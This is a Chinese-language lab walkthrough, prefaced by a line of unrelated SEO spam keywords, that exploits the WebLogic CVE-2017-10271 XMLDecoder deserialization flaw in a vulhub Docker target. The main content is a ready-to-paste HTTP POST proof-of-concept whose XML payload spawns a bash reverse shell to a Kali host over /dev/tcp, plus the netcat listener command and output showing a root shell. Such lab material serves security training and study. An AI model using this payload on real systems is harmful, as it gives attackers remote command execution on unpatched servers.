浏览器73qcc,东莞网络推广及优化,网站建设运动会成绩管理系统,企业网站建设晋升漏洞成因
Weblogic的WLS Security组件对外提供 webservice服务
其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 #xff0c;导致可执行任意命令 原理#xff1a;https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…漏洞成因
Weblogic的WLS Security组件对外提供 webservice服务
其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 导致可执行任意命令 原理https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-master/weblogic/CVE-2017-10271 2.开启靶场【报错重启docker服务】 [rootlocalhost CVE-2017-10271]# docker-compose up -d 3.查看靶场端口 [rootlocalhost CVE-2017-10271]# docker ps 4.访问靶场 192.168.10.5:7001 漏洞利用 1.漏洞发生页 192.168.10.5:7001/wls-wsat/CoordinatorPortType 2.配置poc 192.168.10.5 改成你的CentOS IP 192.168.10.128 改成你的Kali IP 8888 改成你的Kali监听端口 从以下内容开始复制 POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.10.5:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 640 soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ soapenv:Header work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ java version1.4.0 classjava.beans.XMLDecoder void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 string/bin/bash/string /void void index1 string-c/string /void void index2 stringbash -i gt;amp; /dev/tcp/192.168.10.128/8888 0gt;amp;1/string /void /array void methodstart//void /java /work:WorkContext /soapenv:Header soapenv:Body/ /soapenv:Envelope 3.kali监听 8888 端口
nc -lvp 8888
4.bp发送poc请求包
修改右上角 Target 粘贴并发送 5.连接建立成功 ┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
rootaf29889df405:~/Oracle/Middleware/user_projects/domains/base_domain#